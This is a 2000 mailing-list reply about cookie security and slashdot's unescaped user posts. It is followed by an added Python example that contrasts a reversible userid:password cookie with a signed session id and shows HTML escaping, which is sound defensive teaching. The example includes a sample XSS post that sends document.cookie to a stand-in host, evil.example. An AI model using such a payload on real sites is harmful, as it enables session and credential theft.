Hi,
  Actually, in order for this flaw to work one must have both enabled
on the browser. I was just giving people a heads up since the topic
was cookies. And no, IMHO cookies are not required to obtain good
info.
On Mon, 24 Apr 2000, Matt Sergeant wrote:
> On Mon, 24 Apr 2000, Marc Slemko wrote:
> 
> > Don't go holding slashdot up as a great example.  They are a perfect
> > example of what not to do.  Last I checked, and this is probably still
> > true, anyone could make a post that, when read, stole the password of the
> > user reading it if they were logged in at the time.
> > 
> > slashdot does everything wrong.  They allow user posts to be read by
> > others without properly filtering or encoding HTML.  They use a cookie
> > that is simply the user's user id and password, very trivially encoded.  
> > etc.
> 
> Hold yer guns there cowboy! I wasn't saying /. is a great example, just
> that a lot of clueful people use that site (or did?), and it has always
> used cookies. To say that the majority of clueful users turn off cookies
> is just wrong. If anything, clueful users install a junkbuster or
> equivalent and let cookies through for sites they want to use them for.
> 
> > But, for certain applications, there simply aren't any alternatives that
> > don't have more significant problems.  You definitely do have to be very
> > careful when designing your use of cookies so you understand what the
> > risks are and properly minimize them, but just because there are a couple
> > of browser security bugs (and lots have been found in the past, and lots
> > will be found and/or announced in the future) doesn't mean any huge
> > percentage of users have cookies disabled or that you shouldn't use
> > cookies at all.
> 
> I'm not aware of any serious cookie security bugs - maybe I missed
> them. All the ones I can recall were Javascript ones. I still leave
> Javascript on though - but I don't visit a whole lot of sites that would
> be malicious.
> 
> -- 
> <Matt/>
> 
> Fastnet Software Ltd. High Performance Web Specialists
> Providing mod_perl, XML, Sybase and Oracle solutions
> Email for training and consultancy availability.
> http://sergeant.org http://xml.sergeant.org
-- 
_______________________________________________________________________

************** DREAMWVR.COM - TOTAL INTERNET SERVICES ****************
TOTAL DESIGN - DEVELOPMENT - INTEGRATION - SECURITY - Click Here..
<http://www.dreamwvr.com/services/MAX_SEC.html>
DREAMWVR.COM - The Console of Many... 90 Topics Covered
<http://www.dreamwvr.com/dynamicduo.html> <mailto:[EMAIL PROTECTED]>
->> LINUX-MANDRAKE Solution Provider and North American Distributor <<-
PRODUCT OF THE YEAR!
<http://www.dreamwvr.com/mandrake/mandrake-main.html>
"===0 PGP Key Available 
*************** "As Unique as the Company You Keep." *****************
"If anyone speaks from DREAMWVR.COM its certainly not me:-)"
________________________________________________________________________

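The two mistakes Marc lists for slashdot (a cookie that is the user id and password under a reversible encoding, and user posts shown to other readers without HTML encoding) and the safer alternative, as an added example that is not code from this thread, from slashdot, or from any mod_perl project. It assumes base64 as a stand-in for "trivially encoded" (the thread does not say which encoding was used), a constructed server key and session table, a constructed hostile post, and hypothetical function names (weak_cookie, issue_session, resolve_session, render_post_escaped) chosen for illustration.

```python
"""
Added example (not from the thread): a credential-bearing cookie versus an
opaque, server-signed session cookie, and escaping of user-posted HTML.

Assumptions, all constructed for this demo:
  - base64 stands in for "trivially encoded"; the thread names no encoding.
  - SERVER_KEY and SESSIONS live only on the server.
  - HOSTILE_POST is a made-up post carrying script that reads document.cookie.
"""
import base64
import hashlib
import hmac
import html
import secrets
from typing import Optional, Tuple

# --- 1. the weak design: cookie = encode("userid:password") ---------------

def weak_cookie(userid: str, password: str) -> str:
    """Reversible encoding of the credential itself; reading it is a compromise."""
    return base64.b64encode(f"{userid}:{password}".encode()).decode()

def recover_credentials(cookie: str) -> Tuple[str, str]:
    """Whoever obtains the cookie (e.g. via script in a post) gets the password."""
    userid, password = base64.b64decode(cookie).decode().split(":", 1)
    return userid, password

# --- 2. the safer design: random session id, HMAC-signed, revocable -------

SERVER_KEY = b"constructed-demo-key-not-for-real-use"  # assumption: server-side only
SESSIONS = {}  # session id -> userid; constructed in-memory session table

def issue_session(userid: str) -> str:
    """Cookie value is opaque: a random id plus a MAC over it, no credential inside."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = userid
    mac = hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()
    return f"{sid}.{mac}"

def resolve_session(cookie: str) -> Optional[str]:
    """Return the userid for a valid, live cookie; None if forged, tampered or revoked."""
    try:
        sid, mac = cookie.split(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return SESSIONS.get(sid)

def revoke_session(cookie: str) -> None:
    """A stolen session cookie is dead once the server forgets the id."""
    SESSIONS.pop(cookie.split(".", 1)[0], None)

# --- 3. rendering a user post: encode, don't trust -------------------------

def render_post_unfiltered(body: str) -> str:
    """What 'without properly filtering or encoding HTML' amounts to."""
    return f'<div class="comment">{body}</div>'

def render_post_escaped(body: str) -> str:
    """Entity-encode the post so the browser displays text, not markup."""
    return f'<div class="comment">{html.escape(body, quote=True)}</div>'

# constructed sample post: script that would ship the reader's cookie elsewhere
HOSTILE_POST = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    c = weak_cookie("alice", "hunter2")
    print("weak cookie:", c, "-> recovered:", recover_credentials(c))
    s = issue_session("alice")
    print("session cookie resolves to:", resolve_session(s))
    tampered = s[:-1] + ("0" if s[-1] != "0" else "1")
    print("tampered cookie resolves to:", resolve_session(tampered))
    revoke_session(s)
    print("after revocation:", resolve_session(s))
    print("unfiltered:", render_post_unfiltered(HOSTILE_POST))
    print("escaped:   ", render_post_escaped(HOSTILE_POST))
```

The point of the contrast: with the weak design, a cookie read by script in a post is the password, so changing it means changing the password; with the signed opaque id, the same theft yields a session that the server can revoke and that never reveals the credential. Escaping on output is what keeps the script from running in the first place; the signed cookie limits the damage if some other bug lets it be read.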